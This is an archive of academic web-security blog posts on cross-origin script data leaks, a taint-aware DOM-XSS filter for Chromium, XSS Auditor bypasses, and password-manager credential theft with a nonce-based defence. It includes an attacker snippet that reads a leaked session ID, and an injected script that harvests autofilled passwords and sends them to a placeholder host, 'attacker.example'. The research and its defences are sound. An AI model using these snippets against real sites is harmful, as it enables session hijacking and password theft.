Category Archives: Research

Abusing JavaScript Inclusions to Leak Sensitive Data Across Domains

For our upcoming paper, The Unexpected Dangers of Dynamic JavaScript (PDF here), we analyzed a lesser-known vulnerability caused by the browser’s handling of cross-origin JavaScript. While access to data hosted by an external site is normally prohibited by the Same-Origin Policy, the inclusion of third-party script content is intentionally possible (think of including jQuery from its CDN). In this post, we describe the problem and discuss some of the results of our study.

Cross-Origin Script Inclusion

As stated before, the inclusion of script content is somewhat exempt from the protection of the Same-Origin Policy. While a script running on one origin may not read the content of files hosted on another origin (given that the other origin does not use CORS), it may include a script which is hosted on that foreign domain. Whenever a script is included from a third-party site, it inherits the origin of the including page, i.e., it gains full access to the including page’s DOM and JavaScript global object, but, more importantly, registers all its own global variables in the context of the including page. Important to note here is the fact that when the browser conducts the corresponding request, it also sends all cookies belonging to the script’s domain. That means that if the user is logged in to that site and the content of the script is generated on the fly depending on the specific user (identified by his cookies), the response may leak sensitive information.

We consider the following example, which is derived from a real-world vulnerability we discovered in our study.

// located at the vulnerable domain
var username="ben";
var sessionid="10265ed845634413e490432d951d00f0";

In this case, the intention is to register the username and the sessionid for an application hosted by the vulnerable domain. This script, however, is not properly protected against inclusion from another domain. Therefore, the attacker simply puts the following snippet into his Web page, resulting in the victim’s browser conducting an authenticated request towards the target domain.

<script>
  function leaked() {
    alert("I know your sessionid: " + sessionid);
  }
</script>
<script src="" onload="leaked()"></script>

This way, if the victim visiting the attacker’s page is currently logged in to the vulnerable site, the attacker will be able to retrieve the sensitive session information and, thus, steal the user’s session.

Our Empirical Study

To gain insight into the actual prevalence of such flaws on the Web, we conducted a study on 150 highly ranked pages which allowed us to register a user account. On a total of 49 domains, we found evidence of dynamic generation of the JavaScript code on the server side, using the provided cookies to identify the user.

In the simplest case, we were only able to identify the login state of a user, i.e., whether he is logged in to the page or not. While this does not yet leak much information, it might provide a phisher with valuable intel on his target: knowing specifically on which sites a user has accounts increases the chances of a successful phishing attack. We found that 49 domains had at least one issue related to this information leak.

In addition to the knowledge whether a user actually has an account, we also discovered numerous sites which leaked unique identifiers, such as email addresses or user IDs for a specific site. This allows an attacker to easily track his victim and identify him accordingly. 34 domains in our data set leaked such a unique ID.

Next to these, we found that 15 domains leaked personal data of the victim, such as the full name, date of birth or his location (according to the stored settings for the vulnerable application). Additionally, we found a site which leaked the senders and subjects of the last 10 emails and another one which allowed us to extract all calendar entries for the victim.

Last, and most interestingly, we found that 7 domains actually leaked session information. Among this information were both session IDs to be used with the application and CSRF protection tokens, which allowed us to attack the vulnerable application in a second stage. In one case, we could abuse such a leaked CSRF token to store a Cross-Site Scripting payload for the victim. That domain also incorporated a login using the Facebook API. The combination of the leaked CSRF token and the XSS flaw (only exploitable due to the leaked CSRF token) allowed us to craft a payload which would steal the Facebook API token. This in turn enabled us to interact with the user’s Facebook account as if we were the actual application, reading personal information and even posting in the name of the victimized user.



This kind of attack is enabled by the fact that the SOP does not apply to script inclusions from remote hosts. If you are an application developer who wants to use such external scripts, extra care must be taken. First and foremost, it is not a good idea to put user-specific data into scripts with known URLs. As we have shown, this may lead to severe situations in which, for example, your Facebook access is abused by an attacker. If possible, separate your code and data. Data is safe from being leaked in this manner if it is contained in inline scripts. However, these should not be used, as the Content Security Policy forbids them by default (and for good reason). We therefore propose that an application should put only code into includable scripts, never data. Instead, an application should use XmlHttpRequests with CORS to fetch the user-specific data from the server. This mechanism is secure by default and can be configured to allow data access from specified third-party hosts if need be.
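As a concrete sketch of this code/data separation (all origin and endpoint names below are illustrative, not taken from our study): the user-specific data lives behind a JSON endpoint that answers credentialed requests only for whitelisted origins, while the includable script contains no data at all.

```javascript
// Server side (conceptually): decide which Access-Control-Allow-Origin
// header to emit for a credentialed request. An attacker's origin gets
// no header, so his page cannot read the response.
const allowedOrigins = new Set(["https://app.example.com"]);

function corsHeaderFor(requestOrigin) {
  return allowedOrigins.has(requestOrigin) ? requestOrigin : null;
}

// Client side: fetch the user-specific data explicitly instead of
// exposing it through <script src="...">.
function loadUserData() {
  return fetch("https://api.example.com/userdata", {
    credentials: "include", // send cookies, like a script inclusion would
  }).then((res) => res.json());
}
```

Because the browser withholds the response body unless the server echoes the requesting origin, the attacker’s page can trigger the request but never read the data – the inverse of the script-inclusion situation above.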

Using the Referer header for security is also not a good idea. This header may be stripped by an attacker (see koto’s post on the subject). If you use strict Referer checking, you must then decline such a request. However, certain proxies also strip the Referer header for privacy reasons, and in these cases the application will break. In our study, we found a number of sites which conducted Referer checking; however, when we forcefully omitted the header, those sites would serve the content as a fallback, making the application vulnerable again.

If you cannot strictly separate code and data, you should fall back to good old CSRF tokens. Much like their protection against CSRF attacks, unguessable tokens as part of the script’s URL prevent an attacker from constructing the correct URL, thus stopping the attack.


In summary, we found a high number of sites which are susceptible to attacks using dynamically generated JavaScript. The attacks range from simple login oracles, via stealing sensitive data such as calendar entries, to an XSS attack, enabled by a leaked CSRF token, which allowed us to interact with the victim’s Facebook account. Additionally, we found a session hijacking flaw which enabled us to fully interact with the target application in the name of the user. As a side note, we found a flaw on one bank’s site which enabled an attacker to steal the victim’s credit card information and learn his current account balance.

We are currently in the process of notifying sites of the problems. When the issues have been fixed and the site owners agree, we will provide more in-depth explanations of the exploitable apps and the corresponding proof of concept exploits.

Summary of our paper for USENIX Sec ’14 on a new DOM-based XSS filter

Things leading up to this point (and obligatory cat picture)

As discussed in our previous post, our research has shown that while the XSSAuditor in Chrome is able to catch quite a few exploits targeting server-side reflected XSS, it is also prone to being bypassed in situations where the attacker does not need to inject full script tags. One of the underlying problems that the Auditor has to face is the fact that it has no idea how the user-provided data (i.e. the GET or POST parameters) is used on the server side. The strategy therefore is to approximate the flow of data by finding matching pieces that exist both in request and response.

As shown for our BlackHat talk (which is partially taken from the USENIX paper), the Auditor can be bypassed on about 80% of all domains which carry a DOM-based XSS vulnerability. The reasons for that are spread all across the board – from vulnerabilities targeting eval (the Auditor works on HTML, not on JavaScript), via innerHTML (Auditor is off for performance reasons) to issues related to string matching (where the flow of data can no longer be approximated with high certainty).

Before we really get started on our paper, let’s quickly recap our work for CCS 2013. There is a longer post on the topic, but for the sake of this post, let’s briefly summarise: In order to detect DOM-based XSS in a large number of sites, we modified Chromium’s JavaScript engine V8 and rendering engine WebKit (now Blink) such that strings can carry taint information, i.e. we can at all times precisely determine where a given character in a string originated from. Rather than just saying that a given char comes from an untrusted source, the engine allows us to pinpoint the source (such as the URL, cookies, postMessage, …). Using this precise taint information, we logged all calls to sinks such as document.write and eval and built an exploit generator to verify the vulnerabilities. The exploit generator takes in the string, its taint information and the URL of the page on which the flow occurred, and subsequently modifies the URL such that our verification function is called (i.e. it breaks out of the existing HTML or JavaScript context and executes our function).
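As a toy model of what character-level taint means (an illustration in plain JavaScript, not the actual V8/WebKit patch): every character carries a label naming its source, and the labels survive string operations such as concatenation.

```javascript
// Attach a source label ("url", "cookie", "benign", ...) to each character.
function taint(str, source) {
  return [...str].map((ch) => ({ ch, source }));
}

// String operations must propagate the per-character labels.
function concatTainted(a, b) {
  return a.concat(b);
}

// Recover the plain string content.
function plainString(tainted) {
  return tainted.map((c) => c.ch).join("");
}

// Which sources contributed to this string?
function sourcesOf(tainted) {
  return new Set(tainted.map((c) => c.source));
}
```

A sink such as document.write can then ask, per character, whether untrusted bytes reached it – which is exactly the precision the exploit generator relies on.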

Our proposed filter approach

Let’s look at how the Auditor works in slightly more detail. It is located inside the HTML parser and tries to determine snippets of HTML (either tags or attributes) that lead to JavaScript execution. As an example, when it encounters a script tag, it searches the URL for a matching snippet (actually, only up to 100 chars and only until certain patterns, such as //). If one is found, the script’s content is set to an empty string, thereby stopping the execution of the injected payload.

Before we go into detail on our filter, let’s briefly abstract what a Cross-Site Scripting attack is. We argue that it actually is an attack in which the attacker provides data to an application. Since the application does not properly sanitize the data, at some point it ends up being interpreted as code. In general, this is the case for all injection attacks (think about SQL injections or command injections).

Our notion in this is slightly different. Seeing that there are numerous ways around the Auditor which are related to both positioning and string matching, we propose that a filter capable of defending against DOM-based XSS should not be located in the HTML parser – but rather inside the JavaScript engine. If the JavaScript parser is able to determine the exact source information for each string it parses, it is able to check that user-provided data is only interpreted as data and never as code. Speaking in JavaScript terms, we want the user-provided data to end up being a Numeric, String or Boolean Literal, but never to be an Identifier or Punctuator. This approach is dependent on one important requirement: exact source information for each character in the parsed string.
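The distinction can be illustrated with JSON handling (the payload mentioned below is hypothetical): JSON.parse can only ever turn its input into literal values, whereas eval parses the same bytes as full JavaScript, where injected text can become identifiers and punctuators.

```javascript
const userJson = '{"name": "alice"}';

// Data stays data: JSON.parse yields only literals, which the proposed
// policy permits even for fully tainted input.
const parsed = JSON.parse(userJson);

// Code path: eval parses the input as JavaScript, so a payload such as
// '{"name": stealData()}' would contribute an identifier and a call -
// exactly the tainted tokens the taint-aware parser refuses to accept.
function evalJson(input) {
  return eval("(" + input + ")");
}
```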

Luckily, we had already implemented the biggest part of that for CCS! The changes for the current paper mostly required persisting taint deeper into the rendering engine as well as patching other JavaScript-based parsers, such as the JSON parser. After having done that, we extended the classes used inside the JavaScript parser to allow for carrying of taint. Although these changes sound slim, they did require a lot of engineering. In contrast to CCS, where we were only interested in the flow of data to a sink such as eval or document.write, we now needed the taint information deep inside the JavaScript parser.

Also, in order to ensure that an attacker could not inject a script tag pointing to a remote URL (where all the code contained in the response would be untainted), we implemented rules in the HTML parser that did not allow tainted protocols or domains for such scripts. Similarly, we implemented checks in the DOM API that forbid assignment to such dangerous sinks with tainted values.

Evaluation of our approach

After having designed and implemented our filter, we needed to check it against three criteria: false negatives (i.e. not catching exploits), false positives (i.e. blocking legitimate sites) and performance. As discussed, we had a large number of vulnerabilities to begin with, so evaluating the false negatives was straightforward: turn off the XSSAuditor to ensure that there was no interference and then revisit all verified vulnerable pages with our attack payload. To no big surprise, all exploits were caught. To evaluate the false positives, we conducted another crawl of the Alexa Top 10k, this time enabling our filter and report function. The latter would always generate and send a report of blocked JavaScript execution back to our backend server to allow for offline analysis of the block. Operating under the notion that the links contained in the crawled sites usually do not carry an XSS payload, we initially assumed that any block was a false positive. In the following, we go over the results of that crawl.

Blocking legitimate sites

In our compatibility crawl, we analyzed a total of 981,453 URLs, consisting of 9,304,036 frames. The following table shows the results of our crawl, the percentages being relative to the number of frames and total domains crawled, respectively.

Blocking component   Documents         Domains       Exploitable domains
JavaScript           5,979 (0.064%)    50 (0.50%)    22
HTML Parser          8,805 (0.095%)    73 (0.73%)    60
DOM API              182 (0.002%)      60 (0.60%)    8
Sum                  14,966 (0.161%)   183 (1.83%)   90

As the table clearly shows, there are a number of documents that use programming paradigms which are potentially insecure, such as passing user-provided JSON to eval. In some cases, the flows only occur when a certain criterion is met. As an example, Google applies a regular expression to JSON-like input to verify that only JSON is passed and an attack is not possible. Interestingly enough, about half of all the domains on which we found policy-violating (with respect to our proposed policy) usage of user-provided data could be exploited in exactly those blocked flows. Depending on the definition of a false positive – blockage of a secure component or blockage of any component – this cuts down our FP rate to 0.9% with respect to the domains we analysed. More importantly, blocking of a single functionality does not mean that the page is no longer usable – rather, it means that a single component does not function as intended.

To allow pages that properly check the provided data before passing it to eval to continue using this pattern, our prototype implementation supports an explicit untainting API. Calling untaint() on a string returns a completely taint-free version of the string. While this sounds dangerous in terms of an attacker being able to untaint a string, he is faced with a bootstrapping problem: in order to call the untaint function, he first has to execute his own code – which is blocked by our filter.
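A sketch of how a page with its own validation might use this API (untaint() only exists in our patched browser; the stub and the whitelist regular expression below are illustrative):

```javascript
// Stub so the sketch also runs in an unpatched engine.
if (typeof String.prototype.untaint !== "function") {
  String.prototype.untaint = function () { return String(this); };
}

// Hypothetical whitelist in the spirit of the Google example above:
// only strings that look like plain JSON may be evaluated.
const jsonLike = /^[\s\[\]{}:,"0-9a-zA-Z._+-]*$/;

function safeEvalJson(input) {
  if (!jsonLike.test(input)) throw new Error("rejected: not JSON-like");
  // After validation, untaint() marks the string as trusted, so the
  // eval below is not blocked by the filter.
  return eval("(" + input.untaint() + ")");
}
```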


The last piece of the puzzle is the performance of the filter. Obviously, the added code causes additional operations that need to be carried out and thus adds some overhead. The following figure shows the results of running the well-known benchmarks Kraken, Dromaeo, SunSpider and Octane against a vanilla Chromium, our patched version as well as Firefox and IE as comparisons. Note that since strings in these benchmarks do not originate from tainted sources, “Patched Chrome” depicts the overhead that occurs if no string is tainted (just the added logic and memory overhead), whereas “Patched Chrome (worst)” assumes every string to be tainted to give an upper bound of the overhead.



Summarizing the results of the benchmark, our implementation adds about 7 to 17% overhead. This leaves us miles in front of IE and still faster than Firefox. We do believe that additional performance can be gained quite easily. V8 draws much of its superior speed from using assembler macros rather than C++ code for “the easy path” of certain functions such as substrings. Changing these is, however, more error-prone, which is why we opted to always jump out of the ASM code into the runtime when handling tainted strings. Extending the taint-passing logic into the ASM space would – in our minds – significantly improve the performance of our approach.


Since we wrote the conclusion already for the paper, let’s just c&p it here:

In this paper we presented the design, implementation and thorough evaluation of a client-side countermeasure which is capable of precisely and robustly stopping DOM-based XSS attacks. Our mechanism relies on the combination of a taint-enhanced JavaScript engine and taint-aware parsers which block the parsing of attacker-controlled syntactic content. Existing measures, such as the XSS Auditor, are still valuable to combat XSS in cases that are out of scope of our approach, namely XSS which is caused by vulnerable data flows that traverse the server.

In case of client-side vulnerabilities, our approach reliably and precisely detects injected syntactic content and, thus, is superior in blocking DOM-based XSS. Although our current implementation induces a runtime overhead between 7 and 17%, we believe that an efficient native integration of our approach is feasible. If adopted, our technique would effectively lead to an extinction of DOM-based XSS and, thus, significantly improve the security properties of the Web browser overall.


Slides and Whitepaper of our BlackHat talk

In previous research, we found a large number of DOM-based Cross-Site Scripting vulnerabilities across the Alexa Top 5k. Continuing this research, we crawled the Alexa Top 10k and again found XSS on ~10% of the sites we visited. In order to verify the vulnerabilities, we turned off the XSSAuditor which is built into Chrome – in our notion, a vulnerability should be treated as such regardless of whether the filter in one browser catches it or not.

That being said, after the initial verification, we analysed how many of our exploits triggered even with the Auditor activated. Obviously, these numbers were lower than the initial results, so we tried to determine why some exploits passed and some did not. This led to a full-fledged analysis of the Auditor in which we discovered numerous bypasses related to both implementation decisions and conceptual issues such as the placement of the Auditor.

In our BlackHat talk, we presented these bypasses, motivated by real-world examples of DOM-based XSS, showing that over 80% of all domains on which we discovered vulnerabilities were prone to filter bypasses. Go ahead and check out the slides as well as our whitepaper.

Summary of our AsiaCCS paper on implementing a password manager which protects users against XSS attackers

Much of our work focuses on Cross-Site Scripting vulnerabilities. These vulnerabilities are often used by an attacker to steal authentication data such as session cookies and subsequently use the service in the name of his victim. However, we identified another attack in which abusing an XSS vulnerability might come in handy for an attacker: automatically stealing passwords from the victim’s password manager.

Underlying security issue

The scenario in this case is quite straightforward. As discussed by Mozilla’s Justin Dolske, password managers work in a simple manner. Whenever a user enters his credentials into a login form and subsequently submits it, the browser’s password manager is invoked and prompts the user to agree to the storing of these credentials. When the user later comes back to the same login page, the password manager scans the document to determine where the login form is and, if it is found, automatically fills in the previously stored credentials. This, however, comes with inherent security issues, since the credentials are inserted into the document and thus are accessible via the Document Object Model (or short: DOM). The DOM is an API that enables JavaScript to interact with the document, allowing JavaScript to read and modify the document’s structure as it wishes.

Automatically attacking password managers

This is precisely where the Cross-Site Scripting attacker comes into play. The attack is conducted in three steps (which is also shown in the figure below):

  1. The attacker injects a form with a username and password field into the vulnerable document.
  2. The password manager detects the form and automatically (as discussed above) inserts the credentials into the fields.
  3. In the final step, the attacker’s injected code uses the DOM to retrieve the username and password and subsequently sends both back to the attacker’s server.
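The three steps above can be sketched as the script an attacker would inject (the exfiltration host attacker.example is a placeholder, and the one-second delay is an assumption about how quickly the manager autofills):

```javascript
// Step 3's destination: encode the stolen values into a URL that is
// fetched via an <img>, smuggling the credentials to the attacker.
function exfilUrl(user, pass) {
  return "https://attacker.example/steal" +
    "?u=" + encodeURIComponent(user) +
    "&p=" + encodeURIComponent(pass);
}

// Runs inside the vulnerable document via the XSS payload.
function stealCredentials() {
  // 1. Inject a minimal login form.
  const form = document.createElement("form");
  form.innerHTML =
    '<input type="text" name="user"><input type="password" name="pass">';
  document.body.appendChild(form);

  // 2. Give the password manager a moment to autofill ...
  setTimeout(() => {
    // 3. ... then read the credentials out of the DOM and exfiltrate.
    new Image().src = exfilUrl(form.elements.user.value,
                               form.elements.pass.value);
  }, 1000);
}
```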


Factors for the success of these attacks

The degree to which an attack on vulnerable pages can be automatically conducted depends on multiple implementational details. In our work, we identified five of these factors:

  1.  URL matching: The first factor we identified was whether password managers check the URL of the form they insert credentials into. If credentials are merely stored alongside the origin (protocol, domain and port) of the page they were entered into, an XSS vulnerability in any document on said domain is sufficient for an attacker to mount the attack previously described. If the exact URL is stored, the attacker still has the option to either load the login page in a frame or open a popup with it. If the password manager inserts credentials in these viewports, the attacker can still retrieve the data, as the Same-Origin Policy is fulfilled and thus access between frames is permitted.
  2. Form matching: The second factor we found is form matching, i.e., whether the password manager stores the structure and/or the form’s target. This is mainly relevant for simple automation, since an attacker could potentially attack a number of different domains with a minimal form (consisting of only two input fields, one text and one password field). Regardless, an attacker might also choose to build a form that perfectly matches the original one in a targeted attack against a given site.
  3. Autofilling frames: As discussed for URL matching, an attacker is capable of loading the login page in a frame if strict URL matching is employed. However, if a password manager refuses to insert credentials into forms inside frames, the attacker has to open a popup, thus losing a certain amount of stealthiness in his attack. Apart from that, autofilling into frames makes automation much easier, since the attacker can include multiple frames on a site under his control to retrieve the password data from many domains at a time.
  4. User interaction: One show stopper is obviously user interaction. If a password manager requires user interaction, attacks cannot be automated, or at least require some form of social engineering for the victim to click on the corresponding “insert credentials” button.
  5. Autocomplete attribute: The autocomplete attribute was recently added with HTML5 and, according to the spec, setting it to the “off” keyword indicates “[…] that the control’s input data is particularly sensitive”. Thus, whenever a browser encounters such an attribute, it should not offer to store the sensitive data that was entered into the fields. (Quoting the WhatWG wiki: “Otherwise, the user agent should not remember the control’s value, and should not offer past values to the user.”) If, however, this is ignored when storing the credentials and only observed when inserting the stored data, an attacker is able to craft a form of his own with autocomplete=”on” for all fields and thus steal the secret data.

Analyzing the current generation of built-in password managers

With the aforementioned factors in mind, we conducted an analysis of six browsers, namely Chrome 31, Internet Explorer 11, Firefox 25, Opera 18, Safari 7 and the Maxthon Cloud Browser (version 3). Although the latter might not be as well-known as the rest, it is offered to users installing the latest versions of Windows when asked for their browser choice. Hence, we chose to include it in our analysis. The results of the analysis are shown in the following table:

Browser      URL matching   Form matching   Autofilling frames   User interaction   Autocomplete attribute
Chrome 31    No             No              Yes                  No                 Partially
IE 11        Yes            No              No                   Yes                Yes
Firefox 25   No             No              Yes                  No                 Yes
Opera 18     No             No              Yes                  No                 Partially
Safari 7     No             No              Yes                  No                 Yes
Maxthon 3    No             No              Yes                  No                 No

As we can see, the only browser that performs URL matching is Microsoft’s Internet Explorer, whereas the worst-case example is Maxthon. That browser only stores the second-level domain along with the credentials, meaning that an XSS on a given sub-domain, even with a different protocol and port, is sufficient to steal the passwords. IE is also the most secure with respect to autofilling frames and user interaction. Most interesting are the findings related to the autocomplete attribute in Chrome and Safari. We found that if just one field of a form has the autocomplete attribute not set to “off”, the credentials are stored. Although they are not automatically inserted into that field afterwards (in these cases, autocomplete is adhered to), this allows an attacker to craft his own form and trick the password manager into filling it out.

This shows that in most browsers, attacks against the password manager are easily achieved. Apart from Internet Explorer, none of our test subjects required user interaction or did URL matching of any sort.

Our proposed solution

The underlying cause for the attack we described earlier is the fact that password managers are implemented such that they insert credentials into forms (and the DOM) where they can be accessed by JavaScript. Although this is desirable for Web developers, it allows an XSS attacker to steal the stored credentials.

Looking at this, we see a mismatch between the notion of what a password manager should do (i.e. aid the user in the authentication process) and what it does (i.e. insert credentials into forms). We therefore propose to align the notion and implementation of password managers to protect stored passwords from automated, XSS-based attacks.

Inserting the passwords into fields is unnecessary, since they are typically only needed when the login request is sent to the server. Our approach therefore aims at doing just that. The following figure outlines the current implementation (upper part) and our proposed solution.

Instead of inserting the password into the corresponding field, our implementation only inserts a nonce into the password field. This nonce may be accessed by the attacker, since it is completely independent of the password that was originally stored. When the request is sent to the server, our prototype (built as a Firefox extension) detects the nonce and replaces it with the actual password. Thus, the stored password is sent to the server but is never accessible to JavaScript. We also apply restrictions, namely strict matching of the target URL (so the attacker cannot send the credentials to his own server) as well as only replacing the nonce in POST parameters (such that an attacker may not ascertain the password by determining the URL the data is sent to; in GET requests, all parameters are appended to the URL and thus might leak the password).

Functional evaluation

To prove that our approach is sound, we conducted an analysis of password fields on the Alexa Top 4,000. We used natural-language indicators to determine the location of logins (such as the keywords “login” or “sign in” in the links contained on the entry page). In total, we found 2,143 domains with login fields. Although we are sure that this number does not cover all pages which have a login field within the top 4,000 domains, we believe that it is a sufficiently large data set. In our analysis, we found that 325 domains use JavaScript to access the password field in some manner. Manual analysis showed that out of these, 96 domains took the field inputs and sent them to a server using XHRs. Among these, we found

  • 23 domains that hashed the password field’s input before sending it to the server,
  • 1 domain that applied base64 encoding to the password,
  • and 6 domains which used GET requests to send the data to the server.

The remaining domains only checked whether data was present in the fields before posting the form and thus do not cause incompatibilities with our proposed solution. With respect to the data set, we see that only 30 out of 2,143 domains are incompatible with our approach, amounting to an incompatibility rate of just 1.4%. We therefore believe that adoption is feasible, as we have shown with our proof-of-concept implementation for Firefox.